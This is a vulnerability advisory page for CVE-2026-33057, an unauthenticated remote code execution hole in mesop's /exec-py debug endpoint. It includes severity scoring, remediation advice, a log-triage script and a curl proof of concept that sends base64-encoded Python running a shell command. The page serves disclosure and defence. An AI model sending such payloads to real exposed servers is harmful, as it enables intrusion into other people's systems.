Python CVE-2026-33057

CRITICAL
Code Injection (CWE-94)
2026-03-18 https://github.com/mesop-dev/mesop GHSA-gjgx-rvqr-6w6v
9.8
CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Patch released: Mar 31, 2026 - 21:13 (nvd) · Patch available
Analysis Generated: Mar 18, 2026 - 20:15 (vuln.today)
CVE Published: Mar 18, 2026 - 20:05 (nvd) · CRITICAL 9.8

Description (GitHub Advisory)

Summary

A web endpoint in the ai/ testing module accepts untrusted Python code strings and executes them with no authentication, resulting in unrestricted remote code execution. Anyone who can send HTTP requests to this server can run commands on the host machine.

Details

The AI codebase package includes a lightweight debugging Flask server in ai/sandbox/wsgi_app.py. Its /exec-py route accepts a base64-encoded payload in the code parameter of a plain POST request, writes the decoded code to a file on disk, and runs it with execute_module(module_path...).

```python
# ai/sandbox/wsgi_app.py
@flask_app.route("/exec-py", methods=["POST"])
def exec_py_route():
  code = base64.urlsafe_b64decode(request.form.get("code"))
  # ... code is blindly written to file and forcefully executed
```

PoC

```bash
# Payload:
# import os
# os.system('echo "pwned by attacker" > /tmp/pwned.txt')
#
# Base64 string represents the identical payload block above:
# aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ==

curl -X POST http://<target_ip_address_hosting_sandbox>:port/exec-py \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "code=aW1wb3J0IG9zCm9zLnN5c3RlbSgnZWNobyAicHduZWQgYnkgYXR0YWNrZXIiID4gL3RtcC9wd25lZC50eHQnKQ=="
# Validate exploitation target execution natively:
# $ cat /tmp/pwned.txt
# pwned by attacker
```

Impact

Exploitation is trivial against systems that are publicly exposed or lack strictly enforced firewall boundaries: the endpoint gives an unauthenticated caller command execution in the interpreter that runs the sandbox service.
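A log triage sketch for the exposure described above, added here as an example and not taken from the advisory or the mesop project: it scans web access logs for requests that reach /exec-py and separates accepted POSTs from remote clients from probes and local test traffic. The Combined Log Format input, the sample lines, the function names and the reading of a 2xx status as "the route accepted the submitted code" are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Assumed input: Common/Combined Log Format (client, timestamp, request, status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return a finding dict for a request that reaches /exec-py, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # WSGI servers percent-decode the path before routing, so /exec%2Dpy
    # reaches the same route; drop the query string and decode before comparing.
    path = unquote(m["target"].split("?", 1)[0])
    if path != "/exec-py":
        return None
    try:
        remote = not ipaddress.ip_address(m["ip"]).is_loopback
    except ValueError:
        remote = True  # hostname or junk in the client field: treat as remote
    status = int(m["status"])
    if m["method"] == "POST" and 200 <= status < 300:
        verdict = "post-accepted"   # assumption: 2xx means the code was run
    elif m["method"] == "POST":
        verdict = "post-rejected"
    else:
        verdict = "probe"           # e.g. GET answered with 405
    return {"ip": m["ip"], "ts": m["ts"], "verdict": verdict, "remote": remote}

def scan(lines):
    """Classify every line and keep only the /exec-py findings."""
    return [f for f in map(classify, lines) if f]

def urgent(findings):
    """Accepted POSTs from non-loopback clients: treat the host as compromised."""
    return [f for f in findings if f["remote"] and f["verdict"] == "post-accepted"]

# Constructed sample log lines (documentation-range addresses, not real traffic).
SAMPLE = [
    '127.0.0.1 - - [18/Mar/2026:20:01:10 +0000] "POST /exec-py HTTP/1.1" 200 12 "-" "python-requests/2.31"',
    '203.0.113.7 - - [18/Mar/2026:20:07:42 +0000] "GET /exec-py HTTP/1.1" 405 153 "-" "curl/8.5.0"',
    '203.0.113.7 - - [18/Mar/2026:20:07:45 +0000] "POST /exec%2Dpy HTTP/1.1" 200 12 "-" "curl/8.5.0"',
    '198.51.100.4 - - [18/Mar/2026:20:09:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Access logs rarely record POST bodies, so a hit from `urgent()` establishes only that code was submitted; what it did has to come from host forensics.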

Analysis (AI)

An unauthenticated remote code execution vulnerability exists in the mesop Python package's debugging Flask server endpoint (/exec-py) that accepts and executes arbitrary base64-encoded Python code without any authentication or validation. The vulnerability affects the mesop pip package, with a publicly disclosed proof-of-concept demonstrating trivial exploitation requiring only a single HTTP POST request. …


Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

Access: Send HTTP POST request to /exec-py endpoint
Exploit: Submit base64-encoded Python code in parameter
Execution: Flask server decodes and evaluates code
Impact: Execute arbitrary commands with host privileges

Vulnerability Assessment (AI)

Exploitation: A remote unauthenticated attacker can exploit the `/exec-py` endpoint in the AI package's `ai/sandbox/wsgi_app.py` Flask debugging server if it is exposed on the network. …

Risk Assessment: This vulnerability represents a critical real-world risk demanding immediate attention. …

Exploit Scenario: An attacker scans internet-facing systems for exposed Flask debug servers running mesop's sandbox module, identifying the /exec-py endpoint through port scanning or exposed configuration. The attacker crafts a base64-encoded Python payload containing reverse shell commands or credential harvesting scripts and submits it via a simple curl POST request to the /exec-py route without any authentication. …

Remediation: Immediately disable and remove the ai/sandbox/wsgi_app.py debugging Flask server from all production environments and any systems accessible from untrusted networks. …

Recommended Action (AI)

Within 24 hours: Identify all systems running mesop and determine if the /exec-py endpoint is accessible from untrusted networks; immediately restrict network access if exposed. …
